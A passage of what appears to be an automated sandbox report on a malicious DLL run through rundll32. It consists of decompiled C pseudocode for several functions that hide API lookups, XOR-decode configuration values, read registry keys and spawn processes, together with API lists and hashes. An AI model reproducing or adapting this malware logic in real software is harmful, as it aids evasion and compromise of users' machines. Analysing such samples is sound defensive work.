                                          						_t75 =  *0x4bfd2a4; // 0x24da5a8
                                          						_t73 =  *0x4bfd11c; // 0x4bfabc9
                                          						_t18 = _t75 + 0x4bfeb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E04BF58BE(lstrlenW(0x4bfec58) + _a8 + _t57 + _t58 + lstrlenW(0x4bfec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E04BF147E(_v16);
                                          						} else {
                                          							_t64 =  *0x4bfd2a4; // 0x24da5a8
                                          							_t31 = _t64 + 0x4bfec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E04BF147E(_v8);
                                          				}
                                          				return _v20;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04BF3111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 04BF314C
                                          • lstrlen.KERNEL32(?), ref: 04BF3155
                                          • lstrlen.KERNEL32(00000000), ref: 04BF315C
                                          • lstrlenW.KERNEL32(80000002), ref: 04BF316A
                                          • lstrlenW.KERNEL32(04BFEB38), ref: 04BF3173
                                          • lstrlen.KERNEL32(?), ref: 04BF31B7
                                          • lstrlen.KERNEL32(?), ref: 04BF31BF
                                          • lstrlenW.KERNEL32(?), ref: 04BF31CA
                                          • lstrlenW.KERNEL32(04BFEC58), ref: 04BF31D3
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: 435e808a8947fb1495219165e8fef1373912472ac755f686b914ab427d57c3e4
                                          • Instruction ID: 71a7cd3a1401633166c5c041e635ba192c3796477fa02ecb8064f31fce29e9ee
                                          • Opcode Fuzzy Hash: 435e808a8947fb1495219165e8fef1373912472ac755f686b914ab427d57c3e4
                                          • Instruction Fuzzy Hash: A1313A72900209AFDF11AFA4CC4499E7FB9FF44344B154495EA08A7221DB35EA29DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E04BF1493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E04BF57D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0x4bfd260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t18 = _t46 + 0x4bfe3e6; // 0x73797325
                                          					_t66 = E04BF77E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0x4bfd2a4; // 0x24da5a8
                                          						_t19 = _t49 + 0x4bfe747; // 0x70d8cef
                                          						_t20 = _t49 + 0x4bfe0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E04BF684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E04BF684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x4bfd238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E04BF147E(_t68);
                                          				goto L12;
                                          			}




















                                          APIs
                                            • Part of subcall function 04BF57D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04BF14AF,?,?,?,?,00000000,00000000), ref: 04BF57FD
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04BF581F
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04BF5835
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04BF584B
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04BF5861
                                            • Part of subcall function 04BF57D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04BF5877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 04BF14C5
                                          • memset.NTDLL ref: 04BF1500
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04BF333A,73797325), ref: 04BF77F7
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04BF7811
                                          • GetModuleHandleA.KERNEL32(4E52454B,070D8CEF,73797325), ref: 04BF1536
                                          • GetProcAddress.KERNEL32(00000000), ref: 04BF153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF15A5
                                            • Part of subcall function 04BF684E: GetProcAddress.KERNEL32(36776F57,04BF935F), ref: 04BF6869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04BF1582
                                          • CloseHandle.KERNEL32(?), ref: 04BF1587
                                          • GetLastError.KERNEL32(00000001), ref: 04BF158B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 4d7ef0ff09320ba35a15c17a25c6715218d1f66c76e2fd3b8c30fc141a6bd6c3
                                          • Instruction ID: 6a807f60f0cd389f36a4318958b544abd725ea51359759e617661f102a64b9bf
                                          • Opcode Fuzzy Hash: 4d7ef0ff09320ba35a15c17a25c6715218d1f66c76e2fd3b8c30fc141a6bd6c3
                                          • Instruction Fuzzy Hash: 223103B5900208EFDB11AFF8DC88D9EBBBCEB04344F1145A5E60AA7110D735AD499B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E04BF4D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t1 = _t9 + 0x4bfe62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E04BF6027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E04BF58BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E04BF6F33(_t34, _t41, _a8);
                                          						E04BF147E(_t41);
                                          						_t42 = E04BF4759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E04BF147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E04BF4858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E04BF147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E04BF147E(_t28);
                                          				}
                                          				return _t36;
                                          			}















                                          APIs
                                            • Part of subcall function 04BF6027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04BF4D46,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?), ref: 04BF608E
                                            • Part of subcall function 04BF6027: sprintf.NTDLL ref: 04BF60AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?,070D95B0), ref: 04BF4D57
                                          • lstrlen.KERNEL32(?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D5F
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • strcpy.NTDLL ref: 04BF4D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04BF4D81
                                            • Part of subcall function 04BF6F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04BF4D90,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF6F4A
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D9E
                                            • Part of subcall function 04BF4759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04BF4DAA,00000000,?,?,04BF52FE,?,070D95B0), ref: 04BF4763
                                            • Part of subcall function 04BF4759: _snprintf.NTDLL ref: 04BF47C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 520deb2b28d0394dd4831d8df5a8108c4e87fc248b993f092d222ea055337439
                                          • Instruction ID: ec243f519d6fbe2f979428ac68207484855945ed2af381427368d54fd630311f
                                          • Opcode Fuzzy Hash: 520deb2b28d0394dd4831d8df5a8108c4e87fc248b993f092d222ea055337439
                                          • Instruction Fuzzy Hash: 85117377A011297756227BFC9C84C6F3AADEE956683050596FB0CAB100DE38ED0A67B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E04BF98F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0x4bfd2a0; // 0x59935a40
                                          				if(E04BF96D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0x4bfd2d0 = _v12;
                                          				}
                                          				_t23 =  *0x4bfd2a0; // 0x59935a40
                                          				if(E04BF96D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0x4bfd2a0; // 0x59935a40
                                          						_t29 = E04BF10CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0x4bfd240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0x4bfd2a0; // 0x59935a40
                                          						_t30 = E04BF10CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0x4bfd244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0x4bfd2a0; // 0x59935a40
                                          						_t31 = E04BF10CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0x4bfd248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0x4bfd2a0; // 0x59935a40
                                          						_t32 = E04BF10CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0x4bfd004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0x4bfd2a0; // 0x59935a40
                                          						_t33 = E04BF10CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0x4bfd02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0x4bfd2a0; // 0x59935a40
                                          						_t34 = E04BF10CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E04BFA2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E04BF9B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0x4bfd2a0; // 0x59935a40
                                          						_t35 = E04BF10CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E04BFA2EF(0, _t35) != 0) {
                                          						_t86 =  *0x4bfd324; // 0x70d95b0
                                          						E04BF4C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0x4bfd238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}






























                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF99AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF99DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF9A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF9A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF9AC3
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 76772d672ca415fa075afa6a7b3354706422983fbdbf73ee3258b0a4d863618e
                                          • Instruction ID: a2ba34a799db3b2b7402edc0be06875649ab5b8be096692e7b9eb5c851f229e6
                                          • Opcode Fuzzy Hash: 76772d672ca415fa075afa6a7b3354706422983fbdbf73ee3258b0a4d863618e
                                          • Instruction Fuzzy Hash: 685184B1700104EEEB10EBB8DD84E5B76EDEB8870476449A6E70ED7108F635FD499A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 04BF13B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04BF13C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 04BF13DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF1443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF1452
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF145D
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: c6bfe8a5c206985dc7f7e870f338d1e3f8a33ba7fed2095428c9c54827e47bae
                                          • Instruction ID: 53aa70d8a052e7ab4570905a721eb08ec5bf7328465ebd851faa91c39af308e5
                                          • Opcode Fuzzy Hash: c6bfe8a5c206985dc7f7e870f338d1e3f8a33ba7fed2095428c9c54827e47bae
                                          • Instruction Fuzzy Hash: 3D413F35900609ABDB01DFFCD844A9EB7B9EF89301F144466EE18EB110DA75ED4ACFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF57D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E04BF58BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t1 = _t23 + 0x4bfe11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t2 = _t26 + 0x4bfe769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E04BF147E(_t54);
                                          					} else {
                                          						_t30 =  *0x4bfd2a4; // 0x24da5a8
                                          						_t5 = _t30 + 0x4bfe756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x4bfd2a4; // 0x24da5a8
                                          							_t7 = _t33 + 0x4bfe40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x4bfd2a4; // 0x24da5a8
                                          								_t9 = _t36 + 0x4bfe4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x4bfd2a4; // 0x24da5a8
                                          									_t11 = _t39 + 0x4bfe779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E04BF7B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}



















                                          APIs
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04BF14AF,?,?,?,?,00000000,00000000), ref: 04BF57FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04BF581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04BF5835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04BF584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04BF5861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04BF5877
                                            • Part of subcall function 04BF7B01: memset.NTDLL ref: 04BF7B80
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: e3c17995ec2ab6258a18d59f0d60556d8ab98ea1b8893527c48a625fc07d1dea
                                          • Instruction ID: 2d228057d226c56e01cc2a4752b422b6abb15405e0c4bcfd25d4de3b5c119c55
                                          • Opcode Fuzzy Hash: e3c17995ec2ab6258a18d59f0d60556d8ab98ea1b8893527c48a625fc07d1dea
                                          • Instruction Fuzzy Hash: 182110B160060AFFEB20DFA9CC44D6AB7ECEF453047054566EA0DDB211EB74F9098B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E04BFA642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0x4bfd33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E04BFA5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E04BF621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E04BF147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t16 = _t65 + 0x4bfe8de; // 0x65696c43
                                          					_t68 = E04BFA5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d04bfc0
                                          						if(E04BF4C9A( *_t33, _t96, _a8,  *0x4bfd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0x4bfd2a4; // 0x24da5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0x4bfea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0x4bfea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E04BF30FC( &_a24, _t73,  *0x4bfd334,  *0x4bfd338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0x4bfd2a4; // 0x24da5a8
                                          									_t44 = _t75 + 0x4bfe856; // 0x74666f53
                                          									_t78 = E04BFA5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d04bfc0
                                          										E04BF1BC1( *_t47, _t96, _a8,  *0x4bfd338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d04bfc0
                                          										E04BF1BC1( *_t49, _t96, _t103,  *0x4bfd330, _a16);
                                          										E04BF147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d04bfc0
                                          									E04BF1BC1( *_t40, _t96, _a8,  *0x4bfd338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d04bfc0
                                          									E04BF1BC1( *_t43, _t96, _a8,  *0x4bfd330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E04BF147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d04bfc0
                                          					if(E04BF74B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
